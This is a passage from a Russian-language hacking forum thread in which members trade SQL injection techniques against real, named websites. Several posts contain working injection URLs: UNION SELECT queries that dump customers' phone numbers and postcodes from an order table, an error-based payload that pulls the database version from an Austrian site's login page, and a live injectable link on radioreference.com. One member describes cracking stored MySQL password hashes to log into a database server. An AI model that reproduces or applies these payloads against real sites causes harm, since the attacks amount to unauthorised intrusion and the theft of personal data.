Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. nemaniak

    nemaniak Elder - Старейшина

    Joined:
    10 Jun 2008
    Messages:
    198
    Likes Received:
    161
    Reputations:
    108
    Вот очень неплохая для этих дел тулза https://forum.antichat.ru/thread220490.html
     
  2. Koren

    Koren Member

    Joined:
    11 Jul 2009
    Messages:
    71
    Likes Received:
    20
    Reputations:
    1
    запускаем rsaUnDumper(sql) делаем запрос вида
    сайт/detail.php?id=-99+/*!UnIoN+SeLeCt*/+1,2,3,<{param}>,5,6,7,8,9,10,11,12,13,14,15,16,17,18+from+fuck_order+limit+
    указываем к примеру то что нум нужно сдампить тоесть state
    poscode
    phone
    mobile

    дамп... пошли ошибки записей 0
    как только не пробывал что там может не хватать? или дело в запросе?
     
  3. nemaniak

    nemaniak Elder - Старейшина

    Joined:
    10 Jun 2008
    Messages:
    198
    Likes Received:
    161
    Reputations:
    108
    сразу идут ошибки или после какой-то записи?
     
  4. Koren

    Koren Member

    Joined:
    11 Jul 2009
    Messages:
    71
    Likes Received:
    20
    Reputations:
    1
    сразу мен
     
  5. nemaniak

    nemaniak Elder - Старейшина

    Joined:
    10 Jun 2008
    Messages:
    198
    Likes Received:
    161
    Reputations:
    108
    а по запросу в бразере например /detail.php?id=-99+/*!UnIoN+SeLeCt*/+1,2,3,state,5,6,7,8,9,10,11,12,13,14,15,16,17,18+from+fuck_order+limit+1,1+--+
    нормально выводит?
     
  6. Koren

    Koren Member

    Joined:
    11 Jul 2009
    Messages:
    71
    Likes Received:
    20
    Reputations:
    1
    с коментарием -- да , в софте то же он
    вернее нормально если добавить group _ concat
     
    #15206 Koren, 31 Oct 2010
    Last edited: 31 Oct 2010
  7. nemaniak

    nemaniak Elder - Старейшина

    Joined:
    10 Jun 2008
    Messages:
    198
    Likes Received:
    161
    Reputations:
    108
    Тогда хз, так не понять, вышли хотя б в личку скрин проги с твоим запросом
     
  8. j0ker13

    j0ker13 Elder - Старейшина

    Joined:
    28 Jul 2008
    Messages:
    199
    Likes Received:
    16
    Reputations:
    5
    такая ситуация. на сайте mysql-inj. но user()=am***ag@nsite1.net
    т.е. получается база на другом серве. прочитал mysql.user.
    расшифровал пароли. нашел одного юзера у кого host=%
    пытаюсь подключится к nsite1.net- выдает access denied
    в чем может быть трабла?
     
  9. -PRIVAT-

    -PRIVAT- Banned

    Joined:
    17 Apr 2010
    Messages:
    245
    Likes Received:
    139
    Reputations:
    87
    Не понял. Нормально объясни.
     
  10. h00lyshit!

    h00lyshit! [From Nobody To Root]

    Joined:
    10 Sep 2009
    Messages:
    289
    Likes Received:
    289
    Reputations:
    195
    В том, что доступ к базе данных разрешен только с этого домена.
     
  11. Malygos

    Malygos New Member

    Joined:
    9 Oct 2010
    Messages:
    3
    Likes Received:
    0
    Reputations:
    0
    http://www.radioreference.com/apps/audio/?ctid=92

    http://www.radioreference.com/apps/audio/?ctid=92' (opera, not firefox)
    You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'Ip.Ip.Ip.Ip' at line 1
     
  12. -PRIVAT-

    -PRIVAT- Banned

    Joined:
    17 Apr 2010
    Messages:
    245
    Likes Received:
    139
    Reputations:
    87
    Нету тут ничего.
     
  13. Tw!m4

    Tw!m4 Elder - Старейшина

    Joined:
    15 Jun 2007
    Messages:
    187
    Likes Received:
    19
    Reputations:
    0
    есть уязвимый сайт:
    Code:
    www.site.com/index.php?login=<sql>&passwd='
    кол-во столбцов подобрал, но почему то не выводит в какой колонке идет вывод на страницу.

    подскажите чё нють плиз.
     
  14. j0ker13

    j0ker13 Elder - Старейшина

    Joined:
    28 Jul 2008
    Messages:
    199
    Likes Received:
    16
    Reputations:
    5
    2-PRIVAT- and Malygos
    h--ps://rdot.org/forum/showthread.php?t=685
    2Tw!m4
    net vyvoda. esli errory vyvodit - poprobui cherez nih
     
  15. -PRIVAT-

    -PRIVAT- Banned

    Joined:
    17 Apr 2010
    Messages:
    245
    Likes Received:
    139
    Reputations:
    87
    Крути как блинд. Мы не экстрасенсы, линк давай!
     
  16. InfectedM

    InfectedM Elder - Старейшина

    Joined:
    4 Nov 2007
    Messages:
    158
    Likes Received:
    12
    Reputations:
    0
    ПОдскажите плиз есть что-нибудь работающее в паблике для парсинга сайтов из гугла по определенному запросу?
     
  17. Tw!m4

    Tw!m4 Elder - Старейшина

    Joined:
    15 Jun 2007
    Messages:
    187
    Likes Received:
    19
    Reputations:
    0
    2 -PRIVAT-

    Code:
    http://rwo[dot]solutions[dot]co[dot]at/login.php?luser=%27union%20select%20null,null,null,null,null,null,null,null,null,null,null,null,null,null--%20&passwd=testik%27
    
    вот собственно сайтец

    как и говорил, с неверным кол-вом столбцов выдаёт ошибку, при правельном подборе страница показывает как ни в чём не бывало.....
     
  18. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,254
    Likes Received:
    1,147
    Reputations:
    886
    http://rwo.solutions.co.at/ab/ab.php?id=954+or+(1,1)=(select+count(0),concat((select+version()+from+information_schema.tables+limit+0,1),floor(rand(0)*2))from(information_schema.tables)+group+by+2)--+%20&opt=edit
     
    _________________________
  19. Tw!m4

    Tw!m4 Elder - Старейшина

    Joined:
    15 Jun 2007
    Messages:
    187
    Likes Received:
    19
    Reputations:
    0
    А чё тут должно выйти? Чё т я как то не совсем врубаюсь...у меня выдает 404 еррор

    object not found

    PS: все пробелы убрал...
     
  20. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,254
    Likes Received:
    1,147
    Reputations:
    886
    работало 2 минут назад, через дупликат

    по всей видимости скрипт убрали...

    UPD: работает

    Duplicate entry '5.0.45-community-nt1' for key 1
     
    _________________________
    #15220 Konqi, 2 Nov 2010
    Last edited: 2 Nov 2010
    1 person likes this.
Loading...
Thread Status:
Not open for further replies.